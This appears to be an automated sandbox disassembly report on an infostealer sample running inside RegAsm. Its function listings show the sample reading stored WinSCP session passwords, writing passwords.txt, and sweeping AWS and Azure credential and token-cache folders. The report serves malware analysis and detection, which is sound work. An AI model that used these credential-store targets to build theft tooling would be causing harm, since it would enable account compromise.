Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$Value$Open$EnumH_prolog
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 784052110-2798830873
Opcode ID: 7364f70e8fa613d41563274cb42329e6bf380b4ce7c15df2a78df795435f3651
Instruction ID: b5677f6b273411974c0642e7d468d751c5b9a982ece1f2e5d055b2527304d1f9
Opcode Fuzzy Hash: 7364f70e8fa613d41563274cb42329e6bf380b4ce7c15df2a78df795435f3651
Instruction Fuzzy Hash: E7F130B1D0015EAEDB11EBA4CC85FEEB77CAF14308F1441ABE515B2182DB785B88CB65

Function 00408F1C Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 335stringmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00408F21

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?), ref: 0040910D
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 00409115
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00409121
??_U@YAPAXI@Z.MSVCRT ref: 0040912B
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?), ref: 0040913C
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?), ref: 00409148
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040914F
StrStrA.SHLWAPI(?,?,?,?,?,?), ref: 00409161
StrStrA.SHLWAPI(-00000010,?,?,?,?,?), ref: 0040917B
lstrcat.KERNEL32(00000000), ref: 0040918F
lstrcat.KERNEL32(00000000,00000000), ref: 004091A1
lstrcat.KERNEL32(00000000,00426DF8), ref: 004091AF
lstrcat.KERNEL32(00000000,00000000), ref: 004091C1
lstrcat.KERNEL32(00000000,00426DFC), ref: 004091CF
lstrcat.KERNEL32(00000000), ref: 004091DE
lstrcat.KERNEL32(00000000,-00000010), ref: 004091E8
lstrcat.KERNEL32(00000000,00426E00), ref: 004091F6
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?), ref: 00409206
StrStrA.SHLWAPI(00000014,?,?,?,?,?), ref: 00409216
lstrcat.KERNEL32(00000000), ref: 0040922A

Part of subcall function 00408E1E: memset.MSVCRT ref: 00408E45
Part of subcall function 00408E1E: lstrlenA.KERNEL32(?,00000001,?,00409236,00000000,00000000,00000000,?,00409236,00000014,?,?,?,?,?), ref: 00408E5F
Part of subcall function 00408E1E: CryptStringToBinaryA.CRYPT32(?,00000000,?,00409236,00000014), ref: 00408E69
Part of subcall function 00408E1E: memcpy.MSVCRT ref: 00408ED1

lstrcat.KERNEL32(00000000,00000000), ref: 0040923B
lstrcat.KERNEL32(00000000,00426E04), ref: 00409249
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?), ref: 00409259
StrStrA.SHLWAPI(00000014,?,?,?,?,?), ref: 00409269
lstrcat.KERNEL32(00000000), ref: 0040927D

Part of subcall function 00408E1E: lstrcat.KERNEL32(00426C33,00426C37), ref: 00408EF8
Part of subcall function 00408E1E: lstrcat.KERNEL32(00426C33,00426C3A), ref: 00408F10

lstrcat.KERNEL32(00000000,00000000), ref: 0040928E
lstrcat.KERNEL32(00000000,00426E08), ref: 0040929C
lstrcat.KERNEL32(00000000,00426E0C), ref: 004092AA
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?), ref: 004092BA
lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 004092D0
memset.MSVCRT ref: 00409323
CloseHandle.KERNEL32(00000000), ref: 0040932C

Strings

passwords.txt, xrefs: 004092E2

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileH_prologlstrcpy$lstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringSystemTimememcpy
String ID: passwords.txt
API String ID: 2185899561-347816968
Opcode ID: f37a83ad93c3daa73caae49ae7666c56f0765222c749063f561d64b1d4eee5ad
Instruction ID: aecd699fdd7afff7b88a06e35911a32918640e3bdf88133368cfafc8b1d2154c
Opcode Fuzzy Hash: f37a83ad93c3daa73caae49ae7666c56f0765222c749063f561d64b1d4eee5ad
Instruction Fuzzy Hash: 89D1A071800149EFDB01EBE5DD59AEE7F7ABF1A304F10401EF511A31A2DB781A88CB65

Function 004187E7 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00418719), ref: 004187EC
GetProcAddress.KERNEL32 ref: 00418831
GetProcAddress.KERNEL32 ref: 00418848
GetProcAddress.KERNEL32 ref: 0041885F
GetProcAddress.KERNEL32 ref: 00418876
GetProcAddress.KERNEL32 ref: 0041888D
GetProcAddress.KERNEL32 ref: 004188A4
GetProcAddress.KERNEL32 ref: 004188BB
GetProcAddress.KERNEL32 ref: 004188D2
GetProcAddress.KERNEL32 ref: 004188E9
GetProcAddress.KERNEL32 ref: 00418900
GetProcAddress.KERNEL32 ref: 00418917
GetProcAddress.KERNEL32 ref: 0041892E
GetProcAddress.KERNEL32 ref: 00418945
GetProcAddress.KERNEL32 ref: 0041895C
GetProcAddress.KERNEL32 ref: 00418973
GetProcAddress.KERNEL32 ref: 0041898A
GetProcAddress.KERNEL32 ref: 004189A1
GetProcAddress.KERNEL32 ref: 004189B8
GetProcAddress.KERNEL32 ref: 004189CF
GetProcAddress.KERNEL32 ref: 004189E6
LoadLibraryA.KERNEL32 ref: 004189F7
LoadLibraryA.KERNEL32 ref: 00418A08
LoadLibraryA.KERNEL32 ref: 00418A19
LoadLibraryA.KERNEL32 ref: 00418A2A
LoadLibraryA.KERNEL32 ref: 00418A3B
GetProcAddress.KERNEL32(75070000), ref: 00418A56
GetProcAddress.KERNEL32(75FD0000), ref: 00418A71
GetProcAddress.KERNEL32 ref: 00418A88
GetProcAddress.KERNEL32(75A50000), ref: 00418AA3
GetProcAddress.KERNEL32(74E50000), ref: 00418ABE
GetProcAddress.KERNEL32(76E80000), ref: 00418AD9
GetProcAddress.KERNEL32 ref: 00418AF0

Strings

kernel32.dll, xrefs: 004187E7

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: kernel32.dll
API String ID: 2238633743-1793498882
Opcode ID: 08a055ab39353d24183d7840be85a79817b29fbf8eab7748d78734f7432d51fe
Instruction ID: 261ffebea164b3061a7af474a2a3b6216d6c60d22a1ed652357b1e11fa401551
Opcode Fuzzy Hash: 08a055ab39353d24183d7840be85a79817b29fbf8eab7748d78734f7432d51fe
Instruction Fuzzy Hash: 4F713C7D490284EFEB565F61FD689653BB7F70B701300602AEA198B630EB3148E9EF54

Function 1B765660 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 452COMMON

Download Yara Rule

Strings

_node, xrefs: 1B76579E
CREATE TABLE x(%.*s INT, xrefs: 1B7657CA
Auxiliary rtree columns must be last, xrefs: 1B7656B3, 1B7658B3
,%.*s, xrefs: 1B765804, 1B765835

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
API String ID: 0-209218429
Opcode ID: 88db3ebc48b0bbb4d1e62b85c10113d7f5afb927c1d1506072ad47a5dec82a6e
Instruction ID: 91654ce7baa28de60bd120b238829c7948f35c830ee6df0eb7c99753d6f8952d
Opcode Fuzzy Hash: 88db3ebc48b0bbb4d1e62b85c10113d7f5afb927c1d1506072ad47a5dec82a6e
Instruction Fuzzy Hash: C2F1F1B45043069FDB108F28CC85ADBBBE8FF44754F04042AFD8A97251DB36E959CBA6

Function 1B729120 Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 355COMMON

Download Yara Rule

Strings

,%s, xrefs: 1B729297
_node, xrefs: 1B729202
CREATE TABLE x(_shape, xrefs: 1B729268

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%s$CREATE TABLE x(_shape$_node
API String ID: 0-1242591684
Opcode ID: dc8f23a8e3d220419fe97449d621048dcebc7f0aed8f91f9d5937cbdba0673f2
Instruction ID: eee0e084c435dd3f184f74c60c52aaddcf2fe7241907d477a2bc9e68ce88278e
Opcode Fuzzy Hash: dc8f23a8e3d220419fe97449d621048dcebc7f0aed8f91f9d5937cbdba0673f2
Instruction Fuzzy Hash: 2AC101B45403029BDB108F25CC89BDB77F8FF44748F480179F98A86252EB36E559CBA5

Function 1B7DB050 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251COMMON

Download Yara Rule

Strings

NULL, xrefs: 1B7DB267, 1B7DB324, 1B7DB325
%.18s-%s, xrefs: 1B7DB192
(blob), xrefs: 1B7DB26C
vtab:%p, xrefs: 1B7DB283
k(%d, xrefs: 1B7DB0A5
%c%u, xrefs: 1B7DB2C3
BINARY, xrefs: 1B7DB0D3
%s(%d), xrefs: 1B7DB1B3
%lld, xrefs: 1B7DB1DA, 1B7DB24C
,%s%s%s, xrefs: 1B7DB137
program, xrefs: 1B7DB2FB
%.16g, xrefs: 1B7DB217

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 0-900822179
Opcode ID: 7db51b31378ccaeb1ce1a2dea8cdaad233f329e3948512a8650f4b5b77349785
Instruction ID: 8a3a6cd155ead104c99a1ccc64753dd39d688d33b8e351b6065047d131e8e370
Opcode Fuzzy Hash: 7db51b31378ccaeb1ce1a2dea8cdaad233f329e3948512a8650f4b5b77349785
Instruction Fuzzy Hash: 6E91CD719083459BCB04CF14D880BEE77E6EF85784F54888CF989DB352D732E94A97A2

Function 1B69D820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON

Download Yara Rule

Strings

optimize, xrefs: 1B69D9A4
porter, xrefs: 1B69D8EE
unicode61, xrefs: 1B69D90B
fts3_tokenizer, xrefs: 1B69D921
fts3, xrefs: 1B69D9CA
offsets, xrefs: 1B69D956
matchinfo, xrefs: 1B69D970, 1B69D98A
fts3tokenize, xrefs: 1B69DA27
fts4, xrefs: 1B69D9F0
fts4aux, xrefs: 1B69D840
simple, xrefs: 1B69D8A9
snippet, xrefs: 1B69D93C

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 0-449611708
Opcode ID: 1385514c720fe6d117b49decceade1f259b73df590f6adeb2cb520c896bedf38
Instruction ID: a502912201aee55867b647ebad271ea1509e326cd134485f0a53ff520358356c
Opcode Fuzzy Hash: 1385514c720fe6d117b49decceade1f259b73df590f6adeb2cb520c896bedf38
Instruction Fuzzy Hash: 835129F4A443126FEA105E65BCC5FDF36A8AF34A59F040035FD48A2342E768E529C2B6

Function 00417BC0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 135stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00417BC5
memset.MSVCRT ref: 00417BE5

Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A

lstrcat.KERNEL32(?,00000000), ref: 00417C0B
lstrcat.KERNEL32(?,\.azure\), ref: 00417C28

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 004176DE: _EH_prolog.MSVCRT ref: 004176E3
Part of subcall function 004176DE: wsprintfA.USER32 ref: 00417703
Part of subcall function 004176DE: FindFirstFileA.KERNEL32(?,?), ref: 0041771A
Part of subcall function 004176DE: StrCmpCA.SHLWAPI(?,004279C8), ref: 00417737
Part of subcall function 004176DE: StrCmpCA.SHLWAPI(?,004279CC), ref: 00417751
Part of subcall function 004176DE: wsprintfA.USER32 ref: 00417775
Part of subcall function 004176DE: StrCmpCA.SHLWAPI(?,004276CF), ref: 00417786
Part of subcall function 004176DE: wsprintfA.USER32 ref: 004177A3
Part of subcall function 004176DE: PathMatchSpecA.SHLWAPI(?,?), ref: 004177CA
Part of subcall function 004176DE: lstrcat.KERNEL32(?,?), ref: 004177F6
Part of subcall function 004176DE: lstrcat.KERNEL32(?,004279E4), ref: 00417808
Part of subcall function 004176DE: lstrcat.KERNEL32(?,?), ref: 00417818
Part of subcall function 004176DE: lstrcat.KERNEL32(?,004279E8), ref: 0041782A
Part of subcall function 004176DE: lstrcat.KERNEL32(?,?), ref: 0041783E

memset.MSVCRT ref: 00417C63
lstrcat.KERNEL32(?,00000000), ref: 00417C8E
lstrcat.KERNEL32(?,\.aws\), ref: 00417CAB

Part of subcall function 004176DE: wsprintfA.USER32 ref: 004177B7

memset.MSVCRT ref: 00417CE6
lstrcat.KERNEL32(?,00000000), ref: 00417D11
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00417D2E

Part of subcall function 004176DE: FindNextFileA.KERNEL32(00000000,?), ref: 004179D9
Part of subcall function 004176DE: FindClose.KERNEL32(00000000), ref: 004179E8

memset.MSVCRT ref: 00417D69

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Azure\.IdentityService, xrefs: 00417D34
\.aws\, xrefs: 00417C9F
*.*, xrefs: 00417CB6
Azure\.azure, xrefs: 00417C2E
msal.cache, xrefs: 00417D39
\.IdentityService\, xrefs: 00417D22
*.*, xrefs: 00417C33
Azure\.aws, xrefs: 00417CB1
\.azure\, xrefs: 00417C1C

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 2836893066-974132213
Opcode ID: bf3154184508ba766d60cba5abae36ee97fc9e12e862e1f3cc7bf38aefb6ab98
Instruction ID: 91e31a7482ef40e223578e2483da43b57a962cebda613e208493a4a00d0a9574
Opcode Fuzzy Hash: bf3154184508ba766d60cba5abae36ee97fc9e12e862e1f3cc7bf38aefb6ab98
Instruction Fuzzy Hash: 9941F9B1D4421CBACB00EBB4DC4AEDE777CAB0D304F00455BB144A3182EA7C9B888B65

Function 1B817FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON

Download Yara Rule

Strings

winGetTempname4, xrefs: 1B818355
winGetTempname1, xrefs: 1B81817B
winGetTempname5, xrefs: 1B818233
etilqs_, xrefs: 1B81824C
winGetTempname2, xrefs: 1B818094

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 0-2933911573
Opcode ID: 73eeb4afabb081657a4dcfff5c69205a6f197cc898f6b184f06bfb1ea0f62b21
Instruction ID: 7265d75eef107a503ae7dbfa973833bcfc8e572fb52e72491d078eb84769afd3
Opcode Fuzzy Hash: 73eeb4afabb081657a4dcfff5c69205a6f197cc898f6b184f06bfb1ea0f62b21
Instruction Fuzzy Hash: 7EA18DF6A413065FDB005F28AC83BEA7799DF41A11F444165EC889F282E66BE10FC7B5

Function 1B6A2BE0 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 346COMMON

Download Yara Rule

Strings

NULL, xrefs: 1B6A2E38
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6A2E69
invalid, xrefs: 1B6A2E4E
%s at line %d of [%.10s], xrefs: 1B6A2E78
misuse, xrefs: 1B6A2E73
WHERE name=%Q, xrefs: 1B6A2DB7
API call with %s database connection pointer, xrefs: 1B6A2E5A
SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 1B6A2DA4
ORDER BY name, xrefs: 1B6A2DCC
unopened, xrefs: 1B6A2E55

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-1179878930
Opcode ID: 4201db30ceb80cf5221a37fd33bcffea15b8d0497ef6ecf6602dccb3f5cac054
Instruction ID: ce046acea4726b8468259eeb1735f45cdb43c0788f6c0de7c3c17c3867c802c6
Opcode Fuzzy Hash: 4201db30ceb80cf5221a37fd33bcffea15b8d0497ef6ecf6602dccb3f5cac054
Instruction Fuzzy Hash: B8C101F09843219BDF109F34CC85BDB77A4AF60715F044429EC9A9B242E735ED8AC7A2

Function 00409391 Relevance: 30.4, APIs: 20, Instructions: 418stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00409396

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
